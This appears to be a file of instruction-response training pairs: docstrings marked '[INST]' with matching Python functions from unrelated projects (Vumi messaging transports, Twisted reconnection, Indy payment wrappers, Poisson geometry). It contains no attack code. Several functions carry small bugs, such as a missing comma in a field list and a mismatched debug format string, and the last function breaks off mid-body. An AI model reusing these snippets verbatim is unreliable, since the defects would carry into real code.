+doesn't already have them. (`Agent` assumes its transport has these.). [/INST] def patch_transport_fake_push_producer(transport):
+ patch_if_missing(transport, 'pauseProducing', lambda: None)
+ patch_if_missing(transport, 'resumeProducing', lambda: None)
+ patch_if_missing(transport, 'stopProducing', transport.loseConnection)
+[INST] Patch abortConnection() on the transport or add it if it doesn't already
+exist (`Agent` assumes its transport has this).
+
+The patched method sets an internal flag recording the abort and then calls
+the original method (if it existed) or transport.loseConnection (if it
+didn't).. [/INST] def patch_transport_abortConnection(transport, protocol):
+ _old_abortConnection = getattr(
+ transport, 'abortConnection', transport.loseConnection)
+ def abortConnection():
+ protocol._fake_connection_aborted = True
+ _old_abortConnection()
+ transport.abortConnection = abortConnection
+[INST] Called if the SMPP connection is not bound within
+``smpp_bind_timeout`` amount of seconds. [/INST] def drop_link(self):
+ if self.is_bound():
+ return
+ yield self.service.on_smpp_bind_timeout()
+ yield self.disconnect(
+ 'Dropping link due to binding delay. Current state: %s' % (
+ self.state))
+[INST] Send a PDU to the SMSC. [/INST] def send_pdu(self, pdu):
+ self.emit('OUTGOING >> %r' % (pdu.get_obj(),))
+ return self.transport.write(pdu.get_bin())
+[INST] Called when an SMPP PDU is received for which no handler function has
+been defined.. [/INST] def on_unsupported_command_id(self, pdu):
+ self.log.warning(
+ 'Received unsupported SMPP command_id: %r' % (command_id(pdu),))
+[INST] Called when the bind has been setup. [/INST] def on_smpp_bind(self, sequence_number):
+ self.drop_link_call.cancel()
+ self.disconnect_call = self.clock.callLater(
+ self.idle_timeout, self.disconnect,
+ 'Disconnecting, no response from SMSC for longer '
+ 'than %s seconds' % (self.idle_timeout,))
+ self.enquire_link_call.clock = self.clock
+ self.enquire_link_call.start(self.config.smpp_enquire_link_interval)
+ return self.service.on_smpp_bind()
+[INST] Format a datetime object using the Vumi date format.. [/INST] def format_vumi_date(timestamp):
+ return timestamp.strftime(VUMI_DATE_FORMAT)
+[INST] Parse a timestamp string using the Vumi date format.
+Timestamps without microseconds are also parsed correctly.. [/INST] def parse_vumi_date(value):
+ date_format = VUMI_DATE_FORMAT
+ if "." not in value[-10:]:
+ date_format = _VUMI_DATE_FORMAT_NO_MICROSECONDS
+ return datetime.strptime(value, date_format)
+[INST] A special payload attribute that isn't stored by the message store.. [/INST] def cache(self):
+ return self.payload.setdefault(self._CACHE_ATTRIBUTE, {})
+[INST] Construct a reply message.
+The reply message will have its `to_addr` field set to the original
+message's `from_addr`. This means that even if the original message is
+directed to the group only , the
+reply will be directed to the sender of the original message.. [/INST] def reply(self, content, continue_session=True, **kw):
+ session_event = None if continue_session else self.SESSION_CLOSE
+ for field in [
+ 'to_addr', 'from_addr', 'group', 'in_reply_to', 'provider'
+ 'transport_name', 'transport_type', 'transport_metadata']:
+ if field in kw:
+ raise TypeError("'%s' may not be overridden." % (field,))
+ fields = {
+ 'helper_metadata': self['helper_metadata'],
+ 'session_event': session_event,
+ 'to_addr': self['from_addr'],
+ 'from_addr': self['to_addr'],
+ 'group': self['group'],
+ 'in_reply_to': self['message_id'],
+ 'provider': self['provider'],
+ 'transport_name': self['transport_name'],
+ 'transport_type': self['transport_type'],
+ 'transport_metadata': self['transport_metadata'],
+ }
+ fields.update(kw)
+ out_msg = TransportUserMessage(content=content, **fields)
+ out_msg.set_routing_endpoint(self.get_routing_endpoint())
+ return out_msg
+[INST] Messages sent to the bot will arrive here. Command handling routing
+is done in this function.. [/INST] def onMessage(self, message):
+ if not isinstance(message.body, DomishElement):
+ return None
+ text = unicode(message.body).encode('utf-8').strip()
+ from_addr, _, _ = message['from'].partition('/')
+ self.message_callback(
+ to_addr=self.jid.userhost(),
+ from_addr=from_addr,
+ content=text,
+ transport_type='xmpp',
+ transport_metadata={
+ 'xmpp_id': message.getAttribute('id'),
+ })
+[INST] Perform a SOAP request.
+If the remote server responds with an HTTP 500 status, then it is assumed
+that the body contains a SOAP fault, which is then parsed and a `SoapFault`
+exception raised.. [/INST] def perform_soap_request(uri, action, body, header=None,
+ expected_faults=None,
+ http_request_full=http_request_full):
+ def _parse_soap_response(response):
+ root = fromstring(response.delivered_body)
+ body, header = unwrap_soap_envelope(root)
+ if response.code == http.INTERNAL_SERVER_ERROR:
+ raise SoapFault.from_element(body, expected_faults)
+ return body, header
+ envelope = soap_envelope(body, header)
+ headers = {
+ 'SOAPAction': action,
+ 'Content-Type': 'text/xml; charset="utf-8"'}
+ d = http_request_full(uri, tostring(envelope), headers)
+ d.addCallback(_parse_soap_response)
+ return d
+[INST] Wrap an element or text in a SOAP envelope.. [/INST] def soap_envelope(body, header=None):
+ parts = [SOAP_ENV.Body(body)]
+ if header is not None:
+ parts.insert(0, SOAP_ENV.Header(header))
+ return SOAP_ENV.Envelope(*parts)
+[INST] Unwrap a SOAP request and return the SOAP header and body elements.. [/INST] def unwrap_soap_envelope(root):
+ header = elemfind(root, SOAP_ENV.Header)
+ body = elemfind(root, SOAP_ENV.Body)
+ if body is None:
+ raise SoapFault(u'soapenv:Client', u'Malformed SOAP request')
+ return body, header
+[INST] Create a SOAP fault response.. [/INST] def soap_fault(faultcode, faultstring=None, faultactor=None, detail=None):
+ def _maybe(f, value):
+ if value is not None:
+ return f(value)
+ return None
+ xs = [
+ LocalNamespace.faultcode(faultcode),
+ _maybe(LocalNamespace.faultstring, faultstring),
+ _maybe(LocalNamespace.faultactor, faultactor),
+ _maybe(LocalNamespace.detail, detail)]
+ return SOAP_ENV.Fault(*[x for x in xs if x is not None])
+[INST] Parse expected SOAP faults from a SOAP fault ``detail`` element.. [/INST] def _parse_expected_faults(detail, expected_faults):
+ if detail is None:
+ return None
+ for child in detail.getchildren():
+ for exc_type in expected_faults:
+ try:
+ if exc_type.detail_type is not None:
+ det = exc_type.detail_type.from_element(child)
+ if det is not None:
+ return exc_type, det
+ except:
+ log.err(
+ None, 'Error parsing SOAP fault element (%r) with %r' % (
+ child, exc_type.detail_type))
+ return None
+[INST] Parse a SOAP fault element and its details.. [/INST] def parse_soap_fault(body, expected_faults=None):
+ fault = elemfind(body, SOAP_ENV.Fault)
+ if fault is None:
+ return None
+ faultcode = gettext(fault, u'faultcode')
+ faultstring = gettext(fault, u'faultstring')
+ faultactor = gettext(fault, u'faultactor')
+ detail = elemfind(fault, u'detail')
+ if expected_faults is None:
+ expected_faults = []
+ parsed = _parse_expected_faults(detail, expected_faults)
+ return parsed, (faultcode, faultstring, faultactor, detail)
+[INST] Parse a SOAP fault from an ElementTree element.. [/INST] def from_element(cls, root, expected_faults=None):
+ faultinfo = parse_soap_fault(root, expected_faults)
+ if faultinfo is None:
+ raise ValueError(
+ 'Element (%r) does not contain a SOAP fault' % (root,))
+ parsed_fault, faultinfo = faultinfo
+ if parsed_fault is None:
+ parsed_fault = SoapFault, None
+ exc_type, parsed_detail = parsed_fault
+ faultcode, faultstring, faultactor, detail = faultinfo
+ return exc_type(
+ faultcode, faultstring, faultactor, detail, parsed_detail)
+[INST] Serialize this SOAP fault to an ElementTree element.. [/INST] def to_element(self):
+ detail = self.detail
+ if detail is not None:
+ detail = self.detail.getchildren()
+ return soap_fault(
+ self.code, self.string, self.actor, detail)
+[INST] Clean-up of setup done in setup_transport.. [/INST] def teardown_transport(self):
+ self.session_manager.stop()
+ if self.xmlrpc_server is not None:
+ yield self.xmlrpc_server.stopListening()
+[INST] Called by the XML-RPC server when it receives a payload that
+needs processing.. [/INST] def handle_raw_inbound_request(self, message_id, values, d):
+ self.timeout_request = self.callLater(self.timeout,
+ self.timed_out, message_id)
+ self._requests[message_id] = values
+ self._requests_deferreds[message_id] = d
+ if not self.validate_inbound_data(values.keys()):
+ self.timeout_request.cancel()
+ self.remove_request(message_id)
+ d.errback(InvalidRequest("4001: Missing Parameters"))
+ else:
+ session_id = values['TransactionId']
+ session = yield self.session_manager.load_session(session_id)
+ if session:
+ session_event = TransportUserMessage.SESSION_RESUME
+ content = values['USSDRequestString']
+ else:
+ yield self.session_manager.create_session(
+ session_id, from_addr=values['MSISDN'],
+ to_addr=values['USSDServiceCode'])
+ session_event = TransportUserMessage.SESSION_NEW
+ content = None
+ metadata = {
+ 'transaction_id': values['TransactionId'],
+ 'transaction_time': values['TransactionTime'],
+ }
+ res = yield self.publish_message(
+ message_id=message_id,
+ content=content,
+ from_addr=values['MSISDN'],
+ to_addr=values['USSDServiceCode'],
+ session_event=session_event,
+ transport_type=self.transport_type,
+ transport_metadata={'mtn_rwanda_ussd': metadata}
+ )
+ returnValue(res)
+[INST] Read outbound message and do what needs to be done with them.. [/INST] def handle_outbound_message(self, message):
+ request_id = message['in_reply_to']
+ if self.get_request(request_id) is None:
+ return self.publish_nack(user_message_id=message['message_id'],
+ sent_message_id=message['message_id'],
+ reason='Request not found')
+ self.timeout_request.cancel()
+ self.finish_request(request_id,
+ message.payload['content'].encode('utf-8'),
+ message['session_event'])
+ return self.publish_ack(user_message_id=request_id,
+ sent_message_id=request_id)
+[INST] Create a client connection to a fake server.. [/INST] def connect_client(self, fake_server):
+ conn_d = fake_server.await_connection()
+ self.assertNoResult(conn_d)
+ client_d = fake_server.endpoint.connect(self.client_factory)
+ client = self.successResultOf(client_d)
+ conn = self.successResultOf(conn_d)
+ self.assert_connected(conn, client)
+ return (conn, client)
+[INST] Assert that a connection is not yet connected.. [/INST] def assert_pending(self, conn):
+ self.assertEqual(conn.client_protocol, None)
+ self.assertEqual(conn.server_protocol, None)
+ self.assertEqual(conn.connected, False)
+ self.assertEqual(conn.pending, True)
+ self.assertNoResult(conn._accept_d)
+ self.assertNoResult(conn._connected_d)
+ self.assertNoResult(conn._finished_d)
+[INST] Assert that a connection is connected to a client.. [/INST] def assert_connected(self, conn, client):
+ self.assertIsInstance(conn.client_protocol, DummyClientProtocol)
+ self.assertEqual(conn.client_protocol.side, "client")
+ self.assertEqual(conn.client_protocol.connected, True)
+ self.assertEqual(conn.client_protocol.disconnected_reason, None)
+ self.assertIsInstance(conn.server_protocol, DummyServerProtocol)
+ self.assertEqual(conn.server_protocol.side, "server")
+ self.assertEqual(conn.server_protocol.connected, True)
+ self.assertEqual(conn.server_protocol.disconnected_reason, None)
+ self.assertEqual(conn.connected, True)
+ self.assertEqual(conn.pending, False)
+ self.successResultOf(conn._accept_d)
+ self.successResultOf(conn._connected_d)
+ self.assertNoResult(conn._finished_d)
+ self.assertEqual(conn.client_protocol, client)
+[INST] Start a match operation. Expects the query to be POSTed
+as the raw HTTP POST data.
+
+The query is a list of dictionaries. A dictionary should have the
+structure as defined in `vumi.persist.model.Model.index_match`
+
+The results of the query are stored fo limited time. It defaults
+to `MessageStoreCache.DEFAULT_SEARCH_RESULT_TTL` but can be overriden
+by specifying the TTL in seconds using the header key as specified
+in `REQ_TTL_HEADER`.
+
+If the request has the `REQ_WAIT_HEADER` value equals `1` (int)
+then it will only return with a response when the keys are actually
+available for collecting.. [/INST] def render_POST(self, request):
+ query = json.loads(request.content.read())
+ headers = request.requestHeaders
+ ttl = int(headers.getRawHeaders(self.REQ_TTL_HEADER, [0])[0])
+ if headers.hasHeader(self.REQ_WAIT_HEADER):
+ wait = bool(int(headers.getRawHeaders(self.REQ_WAIT_HEADER)[0]))
+ else:
+ wait = False
+ deferred = self._match_cb(query, ttl=(ttl or None), wait=wait)
+ deferred.addCallback(self._render_token, request)
+ return NOT_DONE_YET
+[INST] Callback handler that raises an error when called. [/INST] def _cb(*args, **kwargs):
+ return defer.fail(xmlrpc.Fault(503, 'oh noes!'))
+[INST] Callback handler that raises an error when called. [/INST] def _cb(*args, **kwargs):
+ return defer.fail(ValueError(402, 'Payment Required'))
+[INST] Stop attempting to reconnect and close any existing connections.. [/INST] def stopService(self):
+ self.continueTrying = False
+ waitFor = []
+ if self._delayedRetry is not None and self._delayedRetry.active():
+ self._delayedRetry.cancel()
+ self._delayedRetry = None
+ if self._connectingDeferred is not None:
+ waitFor.append(self._connectingDeferred)
+ self._connectingDeferred.cancel()
+ self._connectingDeferred = None
+ if self._protocol is not None:
+ self._protocolStoppingDeferred = Deferred()
+ waitFor.append(self._protocolStoppingDeferred)
+ self._protocol.transport.loseConnection()
+ d = gatherResults(waitFor)
+ return d.addCallback(lambda _: Service.stopService(self))
+[INST] Have this connector connect again, after a suitable delay.. [/INST] def retry(self, delay=None):
+ if not self.continueTrying:
+ if self.noisy:
+ log.msg("Abandoning %s on explicit request" % (self.endpoint,))
+ return
+ if self.maxRetries is not None and (self.retries >= self.maxRetries):
+ if self.noisy:
+ log.msg("Abandoning %s after %d retries." %
+ (self.endpoint, self.retries))
+ return
+ self.retries += 1
+ if delay is None:
+ self.delay = min(self.delay * self.factor, self.maxDelay)
+ if self.jitter:
+ self.delay = random.normalvariate(self.delay,
+ self.delay * self.jitter)
+ delay = self.delay
+ if self.noisy:
+ log.msg("Will retry %s in %g seconds"
+ % (self.endpoint, delay))
+ def reconnector():
+ proxied_factory = _RestartableProtocolFactoryProxy(
+ self.factory, self)
+ self._connectingDeferred = self.endpoint.connect(proxied_factory)
+ self._connectingDeferred.addCallback(self.clientConnected)
+ self._connectingDeferred.addErrback(self.clientConnectionFailed)
+ self._delayedRetry = self.clock.callLater(delay, reconnector)
+[INST] Call this method after a successful connection: it resets the delay and
+the retry counter.. [/INST] def resetDelay(self):
+ self.delay = self.initialDelay
+ self.retries = 0
+[INST] Process a page of keys and each subsequent page.
+The keys for the current page are handed off to :meth:`fetch_page` for
+processing. If there is another page, we fetch that while the current
+page is being handled and add a callback to process it when the
+current page is finished.
+
+When there are no more pages, we add a callback to close the request.. [/INST] def fetch_pages(self, keys_page, concurrency, request):
+ if request.connection_has_been_closed:
+ return
+ d = self.fetch_page(keys_page, concurrency, request)
+ if keys_page.has_next_page():
+ next_page_d = keys_page.next_page()
+ d.addCallback(lambda _: next_page_d)
+ d.addCallback(self.fetch_pages, concurrency, request)
+ else:
+ d.addCallback(self.finish_request_cb, request)
+ return d
+[INST] Process a page of keys in chunks of concurrently-fetched messages.. [/INST] def fetch_page(self, keys_page, concurrency, request):
+ for keys in chunks(list(keys_page), concurrency):
+ if request.connection_has_been_closed:
+ return
+ yield self.handle_chunk(keys, request)
+[INST] Modifies Indy request by adding information how to pay fees for this transaction
+according to selected payment method.
+
+Payment selection is performed by looking to o
+
+This method consumes set of UTXO inputs and outputs. The difference between inputs balance
+and outputs balance is the fee for this transaction.
+
+Not that this method also produces correct fee signatures.
+
+Format of inputs is specific for payment method. Usually it should reference payment transaction
+with at least one output that corresponds to payment address that user owns.. [/INST] async def add_request_fees(wallet_handle: int,
+ submitter_did: str,
+ req_json: str,
+ inputs_json: str,
+ outputs_json: str) -> (str, str):
+ logger = logging.getLogger(__name__)
+ logger.debug(
+ "add_request_fees: >>> wallet_handle: %r, submitter_did: %r, req_json: %r, inputs_json: %r, outputs_json: %r",
+ wallet_handle,
+ submitter_did,
+ req_json,
+ inputs_json,
+ outputs_json)
+ if not hasattr(add_request_fees, "cb"):
+ logger.debug("add_request_fees: Creating callback")
+ add_request_fees.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p, c_char_p))
+ c_wallet_handle = c_int32(wallet_handle)
+ c_submitter_did = c_char_p(submitter_did.encode('utf-8'))
+ c_req_json = c_char_p(req_json.encode('utf-8'))
+ c_inputs_json = c_char_p(inputs_json.encode('utf-8'))
+ c_outputs_json = c_char_p(outputs_json.encode('utf-8'))
+ (req_with_fees_json, payment_method) = await do_call('indy_add_request_fees',
+ c_wallet_handle,
+ c_submitter_did,
+ c_req_json,
+ c_inputs_json,
+ c_outputs_json,
+ add_request_fees.cb)
+ res = (req_with_fees_json.decode(), payment_method.decode())
+ logger.debug("add_request_fees: <<< res: %r", res)
+ return res
+[INST] Parses response for Indy request with fees.. [/INST] async def parse_response_with_fees(payment_method: str,
+ resp_json: str) -> str:
+ logger = logging.getLogger(__name__)
+ logger.debug("parse_response_with_fees: >>> payment_method: %r, resp_json: %r",
+ payment_method,
+ resp_json)
+ if not hasattr(parse_response_with_fees, "cb"):
+ logger.debug("parse_response_with_fees: Creating callback")
+ parse_response_with_fees.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p))
+ c_payment_method = c_char_p(payment_method.encode('utf-8'))
+ c_resp_json = c_char_p(resp_json.encode('utf-8'))
+ utxo_json = await do_call('indy_parse_response_with_fees',
+ c_payment_method,
+ c_resp_json,
+ parse_response_with_fees.cb)
+ res = utxo_json.decode()
+ logger.debug("parse_response_with_fees: <<< res: %r", res)
+ return res
+[INST] Builds Indy request for getting UTXO list for payment address
+according to this payment method.. [/INST] async def build_get_utxo_request(wallet_handle: int,
+ submitter_did: str,
+ payment_address: str) -> (str, str):
+ logger = logging.getLogger(__name__)
+ logger.debug("build_get_utxo_request: >>> wallet_handle: %r, submitter_did: %r, payment_address: %r",
+ wallet_handle,
+ submitter_did,
+ payment_address)
+ if not hasattr(build_get_utxo_request, "cb"):
+ logger.debug("build_get_utxo_request: Creating callback")
+ build_get_utxo_request.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p, c_char_p))
+ c_wallet_handle = c_int32(wallet_handle)
+ c_submitter_did = c_char_p(submitter_did.encode('utf-8'))
+ c_payment_address = c_char_p(payment_address.encode('utf-8'))
+ (get_utxo_txn_json, payment_method) = await do_call('indy_build_get_utxo_request',
+ c_wallet_handle,
+ c_submitter_did,
+ c_payment_address,
+ build_get_utxo_request.cb)
+ res = (get_utxo_txn_json.decode(), payment_method.decode())
+ logger.debug("build_get_utxo_request: <<< res: %r", res)
+ return res
+[INST] Parses response for Indy request for getting UTXO list.. [/INST] async def parse_get_utxo_response(payment_method: str,
+ resp_json: str) -> str:
+ logger = logging.getLogger(__name__)
+ logger.debug("parse_get_utxo_response: >>> payment_method: %r, resp_json: %r",
+ payment_method,
+ resp_json)
+ if not hasattr(parse_get_utxo_response, "cb"):
+ logger.debug("parse_get_utxo_response: Creating callback")
+ parse_get_utxo_response.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p))
+ c_payment_method = c_char_p(payment_method.encode('utf-8'))
+ c_resp_json = c_char_p(resp_json.encode('utf-8'))
+ utxo_json = await do_call('indy_parse_get_utxo_response',
+ c_payment_method,
+ c_resp_json,
+ parse_get_utxo_response.cb)
+ res = utxo_json.decode()
+ logger.debug("parse_get_utxo_response: <<< res: %r", res)
+ return res
+[INST] Builds Indy request for doing tokens payment according to this payment method.
+This method consumes set of UTXO inputs and outputs.
+
+Format of inputs is specific for payment method. Usually it should reference payment transaction
+with at least one output that corresponds to payment address that user owns.. [/INST] async def build_payment_req(wallet_handle: int,
+ submitter_did: str,
+ inputs_json: str,
+ outputs_json: str) -> (str, str):
+ logger = logging.getLogger(__name__)
+ logger.debug("build_payment_req: >>> wallet_handle: %r, submitter_did: %r, inputs_json: %r, outputs_json: %r",
+ wallet_handle,
+ submitter_did,
+ inputs_json,
+ outputs_json)
+ if not hasattr(build_payment_req, "cb"):
+ logger.debug("build_payment_req: Creating callback")
+ build_payment_req.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p, c_char_p))
+ c_wallet_handle = c_int32(wallet_handle)
+ c_submitter_did = c_char_p(submitter_did.encode('utf-8'))
+ c_inputs_json = c_char_p(inputs_json.encode('utf-8'))
+ c_outputs_json = c_char_p(outputs_json.encode('utf-8'))
+ (payment_req_json, payment_method) = await do_call('indy_build_payment_req',
+ c_wallet_handle,
+ c_submitter_did,
+ c_inputs_json,
+ c_outputs_json,
+ build_payment_req.cb)
+ res = (payment_req_json.decode(), payment_method.decode())
+ logger.debug("build_payment_req: <<< res: %r", res)
+ return res
+[INST] Parses response for Indy request for getting UTXO list.. [/INST] async def parse_payment_response(payment_method: str,
+ resp_json: str) -> str:
+ logger = logging.getLogger(__name__)
+ logger.debug("parse_payment_response: >>> wallet_handle: %r, payment_method: %r, resp_json: %r",
+ payment_method,
+ resp_json)
+ if not hasattr(parse_payment_response, "cb"):
+ logger.debug("parse_payment_response: Creating callback")
+ parse_payment_response.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p))
+ c_payment_method = c_char_p(payment_method.encode('utf-8'))
+ c_resp_json = c_char_p(resp_json.encode('utf-8'))
+ utxo_json = await do_call('indy_parse_payment_response',
+ c_payment_method,
+ c_resp_json,
+ parse_payment_response.cb)
+ res = utxo_json.decode()
+ logger.debug("parse_payment_response: <<< res: %r", res)
+ return res
+[INST] Builds Indy request for doing tokens minting according to this payment method.
+This method consumes set of UTXO inputs and outputs.
+
+Format of inputs is specific for payment method. Usually it should reference payment transaction
+with at least one output that corresponds to payment address that user owns.. [/INST] async def build_mint_req(wallet_handle: int,
+ submitter_did: str,
+ outputs_json: str) -> (str, str):
+ logger = logging.getLogger(__name__)
+ logger.debug("build_mint_req: >>> wallet_handle: %r, submitter_did: %r, outputs_json: %r",
+ wallet_handle,
+ submitter_did,
+ outputs_json)
+ if not hasattr(build_mint_req, "cb"):
+ logger.debug("build_mint_req: Creating callback")
+ build_mint_req.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p, c_char_p))
+ c_wallet_handle = c_int32(wallet_handle)
+ c_submitter_did = c_char_p(submitter_did.encode('utf-8'))
+ c_outputs_json = c_char_p(outputs_json.encode('utf-8'))
+ (mint_req_json, payment_method) = await do_call('indy_build_mint_req',
+ c_wallet_handle,
+ c_submitter_did,
+ c_outputs_json,
+ build_mint_req.cb)
+ res = (mint_req_json.decode(), payment_method.decode())
+ logger.debug("build_mint_req: <<< res: %r", res)
+ return res
+[INST] Builds Indy request for setting fees for transactions in the ledger. [/INST] async def build_set_txn_fees_req(wallet_handle: int,
+ submitter_did: str,
+ payment_method: str,
+ fees_json: str) -> str:
+ logger = logging.getLogger(__name__)
+ logger.debug("build_set_txn_fees_req: >>> wallet_handle: %r, submitter_did: %r, payment_method: %r, fees_json: %r",
+ wallet_handle,
+ submitter_did,
+ payment_method,
+ fees_json)
+ if not hasattr(build_set_txn_fees_req, "cb"):
+ logger.debug("build_set_txn_fees_req: Creating callback")
+ build_set_txn_fees_req.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p))
+ c_wallet_handle = c_int32(wallet_handle)
+ c_submitter_did = c_char_p(submitter_did.encode('utf-8'))
+ c_payment_method = c_char_p(payment_method.encode('utf-8'))
+ c_fees_json = c_char_p(fees_json.encode('utf-8'))
+ set_txn_fees_json = await do_call('indy_build_set_txn_fees_req',
+ c_wallet_handle,
+ c_submitter_did,
+ c_payment_method,
+ c_fees_json,
+ build_set_txn_fees_req.cb)
+ res = set_txn_fees_json.decode()
+ logger.debug("build_set_txn_fees_req: <<< res: %r", res)
+ return res
+[INST] Builds Indy request for getting fees for transactions in the ledger. [/INST] async def build_get_txn_fees_req(wallet_handle: int,
+ submitter_did: str,
+ payment_method: str) -> str:
+ logger = logging.getLogger(__name__)
+ logger.debug("build_get_txn_fees_req: >>> wallet_handle: %r, submitter_did: %r, payment_method: %r",
+ wallet_handle,
+ submitter_did,
+ payment_method)
+ if not hasattr(build_get_txn_fees_req, "cb"):
+ logger.debug("build_get_txn_fees_req: Creating callback")
+ build_get_txn_fees_req.cb = create_cb(CFUNCTYPE(None, c_int32, c_int32, c_char_p))
+ c_wallet_handle = c_int32(wallet_handle)
+ c_submitter_did = c_char_p(submitter_did.encode('utf-8'))
+ c_payment_method = c_char_p(payment_method.encode('utf-8'))
+ get_txn_fees_json = await do_call('indy_build_get_txn_fees_req',
+ c_wallet_handle,
+ c_submitter_did,
+ c_payment_method,
+ build_get_txn_fees_req.cb)
+ res = get_txn_fees_json.decode()
+ logger.debug("build_get_txn_fees_req: <<< res: %r", res)
+ return res
+[INST] Read a csv reader iterator until a blank line is found.. [/INST] def csv_record_reader(csv_reader):
+ prev_row_blank = True
+ for row in csv_reader:
+ if not (len(row) == 0):
+ if row[0].startswith('#'):
+ continue
+ yield [cell.strip() for cell in row]
+ prev_row_blank = False
+ elif not prev_row_blank:
+ return
+[INST] Read a reader iterator and return a list of dictionaries, each including column name and value.. [/INST] def dataframe(reader, columns):
+ df = []
+ for row in reader:
+ df.append(dict(zip(columns, row)))
+ return df
+[INST] Returns a standard warning that can be placed at the top of each
+generated _Fortran_ include file.. [/INST] def header():
+ return """
+! -------------------
+! W A R N I N G
+! -------------------
+!
+! This code fragment is automatically generated by MAPL_GridCompSpecs_ACG.
+! Please DO NOT edit it. Any modification made in here will be overwritten
+! next time this file is auto-generated. Instead, enter your additions
+! or deletions in the .rc file in the src tree.
+!
+ """
+[INST] This method check if the dimension variable is valid for the this class. [/INST] def validate_dimension(dim):
+ if not isinstance(dim, int):
+ raise DimensionError(F"{dim} is not int")
+ if dim < 2:
+ raise DimensionError(F"{dim} < 2")
+ else:
+ return dim
+[INST] Constructs the matrix of a 2-contravariant tensor field or bivector field.
+Parameters. [/INST] def bivector_to_matrix(self, bivector, latex=False):
+ bivector_matrix = sym.zeros(self.dim + 1)
+ for e in bivector:
+ if len(set(e)) < len(e):
+ raise MultivectorError(F"repeated indexes {e} in {bivector}")
+ if len(tuple(filter(lambda x: (x <= 0), e))) > 0:
+ raise MultivectorError(F"invalid key {e} in {bivector}")
+ bivector_matrix[e] = bivector[e]
+ swap_e = e[::-1]
+ bivector_matrix[swap_e] = (-1) * bivector_matrix[e]
+ return sym.latex(bivector_matrix) if latex else bivector_matrix[1:, 1:]
+[INST] Check if a differential 1-form alpha belongs to the kernel of a given Poisson bivector field,
+that is check if P#(alpha) = 0
+
+Parameters. [/INST] def is_in_kernel(self, bivector, one_form):
+ image = self.sharp_morphism(bivector, one_form)
+ if not isinstance(image, dict):
+ return image
+ return False if bool(image) else True
+[INST] Check if a homogeneous Poisson bivector field is unimodular
+or not.
+
+Parameters. [/INST] def is_unimodular_homogeneous(self, bivector):
+ for key in bivector:
+ if sym.homogeneous_order(bivector[key], *self.coords) is None:
+ msg = f'{key}: {bivector[key]} is not a polynomial homogeneous with respect to {self.coordinates}'
+ raise Nonhomogeneous(msg)
+ if sym.homogeneous_order(bivector[key], *self.coords) < 0:
+ msg = f'{key}: {bivector[key]} is not a polynomial homogeneous with respect to {self.coordinates}'
+ raise Nonhomogeneous(msg)
+ mod_vf = self.modular_vf(bivector, '1')
+ if not isinstance(mod_vf, dict):
+ return mod_vf
+ return False if bool(mod_vf) else True
+[INST] This method compute the Gauge transformation of a Poisson bivector field.
+Parameters. [/INST] def gauge_transformation(self, bivector, two_form, gauge_biv=True, det=False, latex=False):
+ if not gauge_biv and not det:
+ return {}
+ bivector_matrix = self.bivector_to_matrix(bivector)
+ two_form_matrix = self.bivector_to_matrix(two_form)
+ if not isinstance(bivector_matrix, sym.matrices.dense.MutableDenseMatrix):
+ return bivector_matrix
+ if not isinstance(two_form_matrix, sym.matrices.dense.MutableDenseMatrix):
+ return two_form_matrix
+ I_plus_deltas = [sym.eye(self.dim) + two_form_matrix.col(0) * ((-1) * bivector_matrix.row(0))]
+ for k in range(1, self.dim - 1):
+ I_plus_deltas.append(I_plus_deltas[k - 1] + two_form_matrix.col(k) * ((-1) * bivector_matrix.row(k)))
+ adj_I_deltas = [sym.Matrix.adjugate(e) for e in I_plus_deltas]
+ viT_adj_I_deltas_ui = [(((-1) * bivector_matrix.row(i)) * adj_I_deltas[i-1] * two_form_matrix.col(i))[0] for i in range(1, self.dim)]
+ sum_viT_adj_I_deltas_ui = sum(viT_adj_I_deltas_ui)
+ gauge_det = 1 + (((-1) * bivector_matrix.row(0)) * two_form_matrix.col(0))[0] + sum_viT_adj_I_deltas_ui
+ if det and not gauge_biv:
+ if latex:
+ return sym.latex(gauge_det)
+ return f"{gauge_det}"
+ gauge_det = sym.simplify(gauge_det)
+ if gauge_det == 0:
+ return False
+ BP = two_form_matrix * bivector_matrix
+ I_minus_BP = sym.eye(self.dim) - BP
+ adj_I_BP = sym.Matrix.adjugate(I_minus_BP)
+ inv_I_BP = (1 / gauge_det) * adj_I_BP
+ gauge_matrix = bivector_matrix * inv_I_BP
+ gauge_matrix = sym.matrices.SparseMatrix(gauge_matrix)
+ gauge_matrix_RL = gauge_matrix.RL
+ sym_gauge_bivector = {(e[0] + 1, e[1] + 1): e[2] for e in gauge_matrix_RL if e[0] < e[1]}
+ str_gauge_bivector = {(e[0] + 1, e[1] + 1): f"{e[2]}" for e in gauge_matrix_RL if e[0] < e[1]}
+ if det:
+ if latex:
+ return sym.latex(sym_gauge_bivector), sym.latex(gauge_det)
+ return str_gauge_bivector, f"{gauge_det}"
+ if latex:
+ return sym.latex(sym_gauge_bivector)
+ return str_gauge_bivector
+[INST] Calculates a normal form for Lie-Poisson bivector fields on R^3 modulo linear isomorphisms.
+Parameters. [/INST] def linear_normal_form_R3(self, bivector, latex=False):
+ for key in bivector:
+ if sym.homogeneous_order(bivector[key], *self.coords) is None:
+ msg = f'{key}: {bivector[key]} is not a linear polynomial with respect to {self.coordinates}'
+ raise Nonlinear(msg)
+ if sym.homogeneous_order(bivector[key], *self.coords) != 1:
+ msg = f'{key}: {bivector[key]} is not a linear polynomial with respect to {self.coordinates}'
+ raise Nonlinear(msg)
+ if not bool(bivector):
+ return {}
+ for e in bivector:
+ if len(e) != 2 or len(tuple(filter(lambda x: (x <= 0), e))) > 0:
+ raise MultivectorError(F'invalid key {e} in {bivector}')
+ if len(set(e)) < len(e):
+ raise MultivectorError(F'repeated indexes {e} in {bivector}')
+ if [bivector[e].find(f'{self.variable}') for e in bivector].count(-1) != 0:
+ return {}
+ bivector = sym.sympify(bivector)
+ pair_E_P = []
+ for e in bivector:
+ if sym.simplify(e[0] * e[1] - 6) == 0:
+ pair_E_P.append(-self.coords[0] * bivector[e])
+ if sym.simplify(e[0] * e[1] - 3) == 0:
+ pair_E_P.append(self.coords[1] * bivector[e])
+ if sym.simplify(e[0] * e[1] - 2) == 0:
